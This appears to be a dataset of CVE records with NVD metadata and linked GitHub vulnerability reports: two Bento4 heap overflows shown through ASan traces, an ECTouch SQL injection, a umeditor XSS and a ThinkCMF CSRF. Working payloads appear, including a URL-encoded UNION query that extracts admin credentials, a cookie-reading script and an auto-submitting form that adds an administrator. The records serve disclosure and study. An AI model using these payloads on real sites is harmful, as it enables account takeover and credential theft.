/mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #22 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151 #23 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104 #24 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78 #25 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #26 0xf6a6d636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #27 0x808df1b (/mnt/data/playground/mp42-patch/Build/mp42aac+0x808df1b) 0xf4b00b64 is located 0 bytes to the right of 20-byte region [0xf4b00b50,0xf4b00b64) allocated by thread T0 here: #0 0xf72e4cd6 in operator new(unsigned int) (/usr/lib32/libasan.so.2+0x97cd6) #1 0x86b7892 in AP4_Array<AP4_ElstEntry>::EnsureCapacity(unsigned int) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4Array.h:172 #2 0x86b7892 in AP4_ElstAtom::AP4_ElstAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ElstAtom.cpp:73 #3 0x86bccb5 in AP4_ElstAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ElstAtom.cpp:51 #4 0x82e1ccc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:549 #5 0x8301ca3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #6 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #7 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #8 0x82be680 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:88 #9 0x82dc711 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:768 #10 0x8301ca3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #11 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #12 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #13 0x901195b in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4TrakAtom.cpp:165 #14 0x82da849 in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4TrakAtom.h:58 #15 0x82da849 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:383 #16 0x8301ca3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #17 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #18 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #19 0x841a898 in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.cpp:80 #20 0x82e2631 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.h:56 #21 0x82e2631 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:363 #22 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #23 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151 #24 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104 #25 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78 #26 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #27 0xf6a6d636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) SUMMARY: AddressSanitizer: heap-buffer-overflow /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ElstAtom.cpp:88 AP4_Array<AP4_ElstEntry>::Append(AP4_ElstEntry const&) Shadow bytes around the buggy address: 0x3e960110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e960120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e960130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e960140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e960150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3e960160: fa fa fa fa fa fa fa fa fa fa 00 00[04]fa fa fa 0x3e960170: 00 00 04 fa fa fa 00 00 00 00 fa fa 00 00 00 00 0x3e960180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e960190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e9601a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e9601b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==89902==ABORTING The reason is that the program does not handle the -m32 complier flag and still let the program read the string in 64bit manner and cause the overwrite. ![image](https://user-images.githubusercontent.com/7632714/62779758-ac736980-bae6-11e9-8e32-45d60fa4dc35.png) Here is the Poc input: [poc_input5.zip](https://github.com/axiomatic-systems/Bento4/files/3486360/poc_input5.zip)
Buffer overflow in Ap4ElstAtom.cpp
https://api.github.com/repos/axiomatic-systems/Bento4/issues/414/comments
0
2019-08-09T12:45:59Z
2019-08-25T16:22:46Z
https://github.com/axiomatic-systems/Bento4/issues/414
478,968,882
414
2,189
CVE-2020-19721
2021-07-13T22:15:09.067
A heap buffer overflow vulnerability in Ap4TrunAtom.cpp of Bento 1.5.1-628 may lead to an out-of-bounds write while running mp42aac, leading to system crashes and a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/415" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/415" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/axiomatic-systems/Bento4/issues/415
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
There is a heap buffer overflow in Ap4TrunAtom.cpp when running mp42aac. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 To reproduce the bug, compile the project with flag '-DCMAKE_C_FLAGS=-g -m32 -fsanitize=address,undefined' then run: './mp42aac input /dev/null' ==147243==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf4208b40 at pc 0x083eb6d5 bp 0xffef35d8 sp 0xffef35c8 WRITE of size 4 at 0xf4208b40 thread T0 #0 0x83eb6d4 in AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4TrunAtom.h:58 #1 0x83d7d9b in AP4_TrunAtom::AP4_TrunAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4TrunAtom.cpp:127 #2 0x83dde35 in AP4_TrunAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4TrunAtom.cpp:51 #3 0x82dd3b4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:408 #4 0x8301ca3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #5 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #6 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #7 0x841a898 in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.cpp:80 #8 0x82e2631 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.h:56 #9 0x82e2631 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:363 #10 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #11 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151 #12 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104 #13 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78 #14 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #15 0xf6a26636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #16 0x808df1b (/mnt/data/playground/mp42-patch/Build/mp42aac+0x808df1b) 0xf4208b40 is located 0 bytes to the right of 34624-byte region [0xf4200400,0xf4208b40) allocated by thread T0 here: #0 0xf729dcd6 in operator new(unsigned int) (/usr/lib32/libasan.so.2+0x97cd6) #1 0x83e9fa7 in AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity(unsigned int) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4Array.h:172 #2 0x83e9fa7 in AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4Array.h:210 SUMMARY: AddressSanitizer: heap-buffer-overflow /mnt/data/playground/mp42-a/Source/C++/Core/Ap4TrunAtom.h:58 AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) Shadow bytes around the buggy address: 0x3e841110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3e841120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3e841130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3e841140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3e841150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x3e841160: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa 0x3e841170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e841180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e841190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e8411a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e8411b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==147243==ABORTING [poc_input5.zip](https://github.com/axiomatic-systems/Bento4/files/3486635/poc_input5.zip)
Heap buffer overflow in Ap4TrunAtom.cpp when running mp42aac
https://api.github.com/repos/axiomatic-systems/Bento4/issues/415/comments
0
2019-08-09T13:50:32Z
2019-08-25T16:22:31Z
https://github.com/axiomatic-systems/Bento4/issues/415
478,997,749
415
2,191
CVE-2020-18144
2021-07-14T17:15:07.707
SQL Injection Vulnerability in ECTouch v2 via the integral_min parameter in index.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yundiao/ectouch/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yundiao/ectouch/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ectouch:ectouch:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "3FCDB201-E6E3-4D1A-A480-6564C10A74A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/yundiao/ectouch/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yundiao", "ectouch" ]
I. Vulnerability Source Code Analysis 1. Payload index.php?m=default&c=Exchange&a=asynclist_list&integral_min=2%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%6e%75%6c%6c%2c%70%61%73%73%77%6f%72%64%2c%6e%75%6c%6c%2c%6e%75%6c%6c%2c%6e%75%6c%6c%2c%75%73%65%72%5f%6e%61%6d%65%2c%6e%75%6c%6c%2c%6e%75%6c%6c%2c%6e%75%6c%6c%2c%6e%75%6c%6c%2c%6e%75%6c%6c%20%66%72%6f%6d%20%65%63%73%5f%61%64%6d%69%6e%5f%75%73%65%72%20%6f%72%64%65%72%20%62%79%20%67%6f%6f%64%73%5f%69%64%20%61%73%63%23 Code payload with a URL (notice that there is a space before union): union select null,password,null,null,null,user_name,null,null,null,null,null from ecs_admin_user order by goods_id asc# In the latest version, payload will not be able to bring in SQL code without URL encoding. (Old versions don't require URL encoding to be brought into payload execution; new versions only cause program execution errors, but can't bring in palyad.) 2. Vulnerability access file As can be seen from the URL request, the vulnerability entry file is: /include/apps/default/controllers/ExchangeController.class.php asynclist_list function. ![image](https://github.com/yundiao/WebIssues/blob/master/ectouchCMS/01%20asynclist_list.png) $this->parameter() fetch the parameter of integral_min from the URL REQUEST. exchange_get_goods() bring the parameter in SQL operation. 3. parameter() function ![image](https://github.com/yundiao/WebIssues/blob/master/ectouchCMS/02%20parameter.png) parameter() function is located in /include/apps/default/controllers/ExchangeController.class.php controller. Using I function to get the parameters of integral_min. I function is located in /include/base/helpers/function.php The input parameters are obtained and filtered. ![image](https://github.com/yundiao/WebIssues/blob/master/ectouchCMS/04%20default_filter.png) In function I, use DEFAULT_FILTER for filtering. It located in /include/config/global.php , and the value is htmlspecialchars. ![image](https://github.com/yundiao/WebIssues/blob/master/ectouchCMS/05%20htmlspecialchars.png) Converted to single and double quotation marks, But payload does not need single or double quotes. 4. exchange_get_goods() function Located in /include/apps/default/models/ExchangeModel.class.php model. ![image](https://github.com/yundiao/WebIssues/blob/master/ectouchCMS/03%20exchange_get_goods.png) There are no single or double quotation marks in the whole process. ![image](https://github.com/yundiao/WebIssues/blob/master/ectouchCMS/06%20No%20single%20quotation%20marks.png) II. Vulnerability Exploitation 1. Special description: When accessed by a computer-side browser, because of the file “.htaccess” at the root directory, will be denied access. Even just visiting the home page won't do. Because the file just redirects to index.php. No impact on testing and utilization. The name ".htaccess" must be deleted or modified before it can be accessed in a computer browser. It does not affect the use of burpsuite to intercept mobile access vulnerabilities(Mobile access does not require modifying the file name). This test is after modifying the ".htaccess" file name, tested on computer. 2. testing environment Windows + firefox + apache2 + PHP5.4.45(phpStudyIntegrated environment) BrupSuite 3. Payload ![image](https://github.com/yundiao/WebIssues/blob/master/ectouchCMS/07%20burpsuite.png) A、 The end of the request must keep up with two “\r\n”(two lines \r\n);otherwise, there is no response to the request. B、 union select null,password,null,null,null,user_name,null,null,null,null,null from ecs_admin_user order by goods_id asc# (There is a space before nuion)encode with url. C、 Request url: GET /index.php?m=default&c=Exchange&a=asynclist_list&integral_min=2%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%6e%75%6c%6c%2c%70%61%73%73%77%6f%72%64%2c%6e%75%6c%6c%2c%6e%75%6c%6c%2c%6e%75%6c%6c%2c%75%73%65%72%5f%6e%61%6d%65%2c%6e%75%6c%6c%2c%6e%75%6c%6c%2c%6e%75%6c%6c%2c%6e%75%6c%6c%2c%6e%75%6c%6c%20%66%72%6f%6d%20%65%63%73%5f%61%64%6d%69%6e%5f%75%73%65%72%20%6f%72%64%65%72%20%62%79%20%67%6f%6f%64%73%5f%69%64%20%61%73%63%23 HTTP/1.1 ![image](https://github.com/yundiao/WebIssues/blob/master/ectouchCMS/08%20url%20encode.png) D、select”user_name”and”password”, return “admin” and “7d10dca2db594ae1a07a66b0e5b1d938”; After decode with MD5 is “admin”. Get the administrator's account and password.
Ectouch CMS Front-end SQL Injection Vulnerability
https://api.github.com/repos/yundiao/ectouch/issues/1/comments
0
2019-02-12T17:33:14Z
2019-02-12T17:33:14Z
https://github.com/yundiao/ectouch/issues/1
409,417,022
1
2,193
CVE-2020-18145
2021-07-14T18:15:09.377
Cross Site Scripting (XSS) vulnerability in umeditor v1.2.3 via /public/common/umeditor/php/getcontent.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/fex-team/umeditor/issues/624" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/fex-team/umeditor/issues/624" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:baidu:umeditor:1.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "092F83CD-A617-4562-A31D-432A138CCD90", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/fex-team/umeditor/issues/624
[ "Exploit", "Third Party Advisory" ]
github.com
[ "fex-team", "umeditor" ]
Testing environment: localhost Windows + firefox + phpStorm + apache2 + php5.4.45 **I. Vulnerability analysis** /php/getContent.php ![image](https://github.com/yundiao/WebIssues/blob/master/umeditor/Vulnerability%20analysis.png) **II. Exploit** ![image](https://github.com/yundiao/WebIssues/blob/master/umeditor/exploit.png) url: http://127.0.0.1/php/getcontent.php payload: myEditor=<script>alert(document.cookie)</script> **// "E" in the word myEditor must be capitalized.** The same vulnerability exists in all language versions of getContent files. /asp/getContent.asp ![image](https://github.com/yundiao/WebIssues/blob/master/umeditor/asp.png) /jsp/getContent.jsp ![image](https://github.com/yundiao/WebIssues/blob/master/umeditor/jsp.png) /net/getContent.ashx ![image](https://github.com/yundiao/WebIssues/blob/master/umeditor/net.png)
I found a reflective XSS vulnerability in /php/getContent.php
https://api.github.com/repos/fex-team/umeditor/issues/624/comments
0
2019-03-04T17:17:01Z
2019-03-05T03:05:14Z
https://github.com/fex-team/umeditor/issues/624
416,906,167
624
2,194
CVE-2020-18151
2021-07-14T19:15:07.760
Cross Site Request Forgery (CSRF) vulnerability in ThinkCMF v5.1.0, which can add an admin account.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thinkcmf/thinkcmf/issues/580" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thinkcmf/thinkcmf/issues/580" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkcmf:thinkcmf:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56B71E62-C403-4600-A0C8-E5DD12AC8A96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/thinkcmf/thinkcmf/issues/580
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thinkcmf", "thinkcmf" ]
After the administrator loged in, open the page containing the following code. An administrator account will be added automatically. (please replace "http://tp.im" in "url" with the domain name you set.) `<html><body>` `<script type="text/javascript">` `function post(url, fields)` `{` `var p = document.createElement("form");` `p.action = url;` `p.innerHTML = fields;` `p.target = "_self";` `p.method = "post";` `document.body.appendChild(p);` `p.submit();` `}` `function csrf_hack()` `{` `var fields;` `fields += " <input type=\"hidden\" name=\"user&#95;login\" value=\"CSRFadministrator\" />";` `fields += " <input type=\"hidden\" name=\"user&#95;pass\" value=\"admin1234\" />";` `fields += " <input type=\"hidden\" name=\"user&#95;email\" value=\"456&#64;bing&#46;com\" />";` `fields += " <input type=\"hidden\" name=\"role&#95;id&#91;&#93;\" value=\"1\" />";` `var url = "http://tp.im/admin/user/addpost.html";` `post(url, fields);` `}` `window.onload = function(){csrf_hack();}` `</script>` `</body></html>` ![thinkCMF-CSRF](https://user-images.githubusercontent.com/47202604/54935348-171e7100-4f5b-11e9-808c-bd75df78348a.png)
I found a CSRF vulnerability that can add the administrator account
https://api.github.com/repos/thinkcmf/thinkcmf/issues/580/comments
1
2019-03-25T10:35:44Z
